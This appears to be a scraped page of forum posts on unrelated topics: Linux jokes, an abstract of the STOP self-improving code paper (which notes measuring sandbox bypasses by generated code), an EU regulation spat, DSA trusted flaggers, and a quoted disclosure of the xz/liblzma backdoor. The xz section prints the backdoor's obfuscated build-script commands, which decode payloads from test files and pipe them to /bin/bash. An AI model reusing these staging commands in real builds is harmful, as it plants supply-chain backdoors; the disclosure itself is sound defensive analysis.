@lain @LinuxShill idk who else to ping but I'm starting to learn these things and she'd absolutely wipe the floor with me. She even mentions bloat, at this rate I wonder if she shitposts on /g/ in between making tutorials


source for that is, which I cannot bypass the paywall on :marseyshrug:

Pure, distilled, blue-meth autism vs. Something about Chinx and Linux

4chan explains it better

!nooticers you need to nootice harder


Do we think Zuck paid for this article to counter his awkward UFC experience?

Me and who?

Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

This is the repo for the paper: Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

@article{zelikman2023self, title={Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation}, author={Zelikman, Eric and Lorch, Eliana and Mackey, Lester and Kalai, Adam Tauman}, journal={arXiv preprint arXiv:2310.02304}, year={2023} }

Abstract: Several recent advances in AI systems (e.g., Tree-of-Thoughts and Program-Aided Language Models) solve problems by providing a "scaffolding" program that structures multiple calls to language models to generate better outputs. A scaffolding program is written in a programming language such as Python. In this work, we use a language-model-infused scaffolding program to improve itself. We start with a seed "improver" that improves an input program according to a given utility function by querying a language model several times and returning the best solution. We then run this seed improver to improve itself. Across a small set of downstream tasks, the resulting improved improver generates programs with significantly better performance than its seed improver. Afterward, we analyze the variety of self-improvement strategies proposed by the language model, including beam search, genetic algorithms, and simulated annealing. Since the language models themselves are not altered, this is not full recursive self-improvement. Nonetheless, it demonstrates that a modern language model, GPT-4 in our proof-of-concept experiments, is capable of writing code that can call itself to improve itself. We critically consider concerns around the development of self-improving technologies and evaluate the frequency with which the generated code bypasses a sandbox.
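For flavor, the seed improver the abstract describes is roughly this loop. A hypothetical sketch only: `query_lm`, the prompt text, and the candidate count are made up for illustration, not the paper's actual code.

```python
# Hypothetical sketch of a STOP-style seed improver. `query_lm` stands in
# for a language-model call; the paper's real prompt and API differ.
def seed_improver(program, utility, query_lm, n_candidates=4):
    """Ask the LM for improved versions of `program` and keep whichever
    candidate scores best under `utility` (the input is the fallback)."""
    candidates = [program]
    for _ in range(n_candidates):
        prompt = ("Improve the following program so it scores higher on "
                  "its utility function:\n" + program)
        candidates.append(query_lm(prompt))
    # Best-of-n selection against the utility function.
    return max(candidates, key=utility)

# The recursive step: feed the improver its own source code as `program`,
# with a utility that measures how well it improves downstream tasks.
```

Since the LM weights never change, each round only rewrites the scaffolding, which is exactly why the authors call it "not full recursive self-improvement".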






Linked xeet

Every time you share a @GIPHY, you send your data to:

checks notes

816 partners 🤯🤯🤯


EU just ruins things because they can't build anything.

AI often isn't available because of obscure laws. ChatGPT was blocked for a month. Gemini is not available right now. A disaster.

Bureaucrats want to show that they exist.

To my knowledge they've never been "blocked". Google simply didn't release them in the EU for a while.

By delaying things with stupid regulations, they block them.

Personally I don't want to be drinking polluted water, eat unsanitary food, live in a place where all housing is owned by a handful of entities that engage in price-fixing, work 80 hours a week in an environment where the response to mass worker suicides is to install suicide nets, have my privacy violated by private corporations (foreign or domestic) or have my insurance rates tripled by some opaque discriminatory AI, but you do you in whatever dystopian future you dream of.

You're just a low life europoor communist.

EU just wants to kill tech, because its ever changing nature means that they can't control it.

Quite the opposite, in EU there is no innovation because only big tech can comply with regulation.

EU is just hurting its own startups.

USA, India, China. They all have multibillion AI companies. EU doesn't because nobody wants to deal with unpredictable lawmakers

Edit: @dang came and mopped up, RIP _giorgio_

Edit 2: actually _giorgio_ didn't get banned :marseymindblown:


I wanna be a janny :marseyjanny2:

Too soon

Palestinian lives matter


Palestinian lives matter


@X explain your country

Palestinian lives matter


linuxbros.. how will we recover?? i think its time to admit that windows is superior


People are throwing around accusations of compromised github accounts left and right :marseyschizowall: !codecels get in here and start accusing people of being bad actors :marseyglow2:


The recently-enacted European Digital Services Act (DSA) gives the Dublin-based body substantial enforcement powers over social media and video platforms in the area of policing illegal and hateful content.

The Irish regulator has been seeking to recruit trusted flaggers on three-year terms, with specific conditions and rules against conflicts of interest attached. It says that while experience in reporting hateful and illegal content is an advantage, it's not a pre-requisite.

“Approved Trusted Flaggers will have a fast lane when reporting suspected illegal content, where online platforms will be legally obliged to give their notices priority, and to process and decide on these reports without undue delay,” the regulator says on its ‘flaggers' application form.

Areas to be policed include illegal speech such as discrimination and hate speech, non-consensual behaviour, online bullying and “negative effects on civic discourse or elections”. It also includes scams, offences to minors, sexual-based abuse, incitement to self-harm and other topics.




== Compromised Release Tarball ==

One portion of the backdoor is solely in the distributed tarballs. For easier reference, here's a link to debian's import of the tarball, but it is also present in the tarballs for 5.6.0 and 5.6.1:

That line is not in the upstream source of build-to-host, nor is build-to-host used by xz in git. However, it is present in the tarballs released upstream, except for the "source code" links, which I think github generates directly from the repository contents:

This injects an obfuscated script to be executed at the end of configure. This script is fairly obfuscated and uses data from "test" .xz files in the repository. This script is executed and, if some preconditions match, modifies $builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz




sed rpath $(am__test_dir)/$(am__test) | $(am__dist_setup) >/dev/null 2>&1

which ends up as

...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces



eval `grep ^srcdir= config.status`

if test -f ../../config.status;then

eval `grep ^srcdir= ../../config.status`

fi



export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
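The long `export i=` line relies on a chunk-skipping idiom: each `(head -c +1024 >/dev/null)` consumes and discards 1024 bytes of stdin, and the following `head -c +2048` passes the next 2048 bytes through, so the pipeline stitches together selected slices of one stream. A minimal sketch with toy sizes (not the real offsets):

```shell
# Toy version of the skip/keep trick from the injected script:
# the first head eats 4 bytes into /dev/null, the second emits the next 4,
# because both heads share the same stdin and consume it in sequence.
printf 'AAAABBBBCCCC' | { (head -c 4 >/dev/null) && head -c 4; }
# -> BBBB
```

This works because GNU head -c consumes exactly the requested byte count from a pipe, leaving the remainder for the next command.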


After de-obfuscation this leads to the attached injected.txt.
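The tr step in the pipeline, with the hyphens backslash-escaped so tr treats them as literal characters, is what "repairs" the deliberately corrupted test file: it swaps tab with space and `-` with `_`, turning bad-3-corrupt_lzma2.xz back into a valid xz stream. The swap can be demonstrated in isolation:

```shell
# The backdoor's byte-swap: tab<->space and '-'<->'_' are exchanged,
# undoing the test file's intentional "corruption".
printf 'foo-bar_baz' | tr "\t \-_" " \t_\-"
# -> foo_bar-baz
```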

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in

committed upstream. They were initially added in

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due to the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:

For which the exploit code was then adjusted:

Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system. Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the "fixes" mentioned above.

!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024 :marseysal:

NYC creates AI chatbot to help people understand NY law and it immediately starts telling people to break the law

Great thread from Kathryn Tewson about how rslurred this thing is

Based AI telling employer to take worker's tips lmao
